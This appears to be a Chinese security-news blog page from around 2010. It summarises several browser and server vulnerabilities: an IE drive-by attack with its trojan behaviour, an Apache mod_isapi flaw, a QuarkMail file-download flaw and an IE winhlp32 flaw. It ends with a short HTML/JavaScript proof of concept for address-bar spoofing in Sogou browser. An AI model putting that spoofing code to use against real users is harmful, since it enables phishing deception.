据国外媒体报道,麦咖啡官方博客表示,一名以色列黑客已经找出最新的IE浏览器漏洞,编写出一个漏洞攻击代码。通过 Metasploit点击工具,该漏洞 攻击代码可以针对IE 6和IE 7用户进行偷渡式下载攻击.
最新漏洞攻击代码的出现距离微软公司确认漏洞不足24小时,这将迫使微软提前发布临时漏洞补丁。以色列黑客Moshe Ben Abu表示,麦咖啡实验室识别了来自topix21century.com域名的攻击。在此次攻击中,漏洞用户直接进入恶意页面,以偷渡式下载方式下载和 执行一个名为notes.exe或svohost.exe的文件。攻击中包括了数个木马病毒变种。Notes.exe以%temp%目录复制两次,并产生 一个DLL文件。该DLL文件注入IE浏览器,为攻击者提供远程入口。
攻击者可以通过该后门程序对受害者计算机执行各种攻击,包括上传和下载文件,执行文件,以及终止运行进程。受害者计算机与 notes.topix21century.com域名通过https进行通信。
据悉,微软公司发布安全公告(981374)指出,漏洞涉及Windows XP/2000/2003操作系统下的IE6和IE7浏览器。XP SP2/SP3的IE7(无DEP)入侵率达50%,稍好于IE6.
消息来源:http://www.cert.org.cn/articles/bulletin/common/2010031024864.shtml
安全漏洞:CN-VA10-27
发布日期:2010年03月10日
漏洞类型:远程执行代码
漏洞评估:严重
受影响的系统:
Windows 2000平台上的Internet Explorer 6 SP1
Windows XP平台上的Internet Explorer 6、Internet Explorer 7
Windows Server 2003 平台上的Internet Explorer 6 、Internet Explorer 7
Windows Vista 平台上的Internet Explorer 7
Windows Server 2008 平台上的Internet Explorer 7
阅读全文
西瓜注释:经过测试,在我的xp sp3的主机上攻击apache 2.2.11,按照演示视频中的操作未能成功,经检查本机没有smtpsend.dll文件,不知道是不是跟这个有关,在更换为其他的dll文件后,仍旧未能成功,请高手测试过的人指教一下。
IT安全公司 Sense of Security在Apache的HTTP web server中发 现了一 个严重的漏洞,该漏洞允许远程攻击者获得一个数据库的完整控制权。该漏洞存在于Apache核心的mod_isapi模块中。
利用该漏洞,一位攻 击者能远程提升系统权限,从而威胁到数据安全。Apache 2.2.14及早期版本的用户应该尽快升级到 Apache 2.2.15。不过,该漏洞只影响到在Windows上运行的Apache web server。Sense of Security公开了利用该漏洞的
一 个概念验证演示(
视 频)。
阅读全文
From:http://www.aaibase.cn/Article/hk/201002/608.html
发现者:me
漏洞说明:快客电邮(QuarkMail)是北京雄智伟业科技公司推出的电子邮件系 统,被广泛用于各个领域的电子邮件解决方案(该产品的主要客户名单http://www.ipmotor.com/cases/cases.html), 其webmail部分使用perl cgi编写,近日笔者在渗透测试过程当中发现一处严重的安全漏洞,导致远程用户可以在邮件系统上以当前web权限身份下载任意文件,获取敏感配置文件(如 系统口令文件/数据库密码)从而进一步渗透主机或者系统。
阅读全文
这个漏洞其实在2007年2月就被ISEC发现,只是他们2010年2月才公开。From:exploit-db
# Title: Internet Explorer ‘winhlp32.exe’ ‘MsgBox()’ Remote Code Execution Vulnerability
# EDB-ID: 11615
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Maurycy Prodeus
# Published: 2010-03-02
阅读全文
微软日前承认,正在调查IE浏览器的一处新漏洞,该漏洞允许黑客在Windows XP计算机中植入恶意软件。 该漏洞是由安全公司“iSEC安全 研究中心”分析师Maurycy Prodeus发现的,并公布了攻击代码。Prodeus称,IE7和IE8用户都受该漏洞影响。 对此,微软安全响应中心高级经理杰瑞·布莱恩特(Jerry Bryant)已给予证实,称“微软正在调查该漏洞,目前的结果是,Windows Vista、Windows 7、Windows Server 2008和Windows Server 2008 R2系统不受影响。” 布莱恩特还称,目前还没有迹象表明该漏洞已经被黑客利用。由于需要用户干预,微软将该漏洞评级为“中”,但有安全专家将其定级为“中高”。
网友纷纷评论这是微软为了推Win7而故意泄露的漏洞,让大家抛弃xp。
徐工
搜狗浏览器版本:1.4.0.418(正式版)
漏洞成因:在搜狗浏览器中,window.location和document.write两个函数发生条件竞争阻 塞。“window.location”函数使URL中显示到一个地址域,同时页面元素却可以被“document.write”函数所改写。这样导致攻 击者可以篡改页面,来实施钓鱼欺骗攻击。
效果图:
POC:
<center>
<h1>SogouExplorer spoofing</h1>
</center>
<p>
<a href=”javascript:spoof()”>test!</a>
<p>
<script>
function spoof()
{
window.location = “http://www.google.com”;
document.write(“<title>Google</title>”);
document.write(“<h1>FAKE PAGE</h1>”);
document.write(“xisigr[xeye]“);
}
</script>
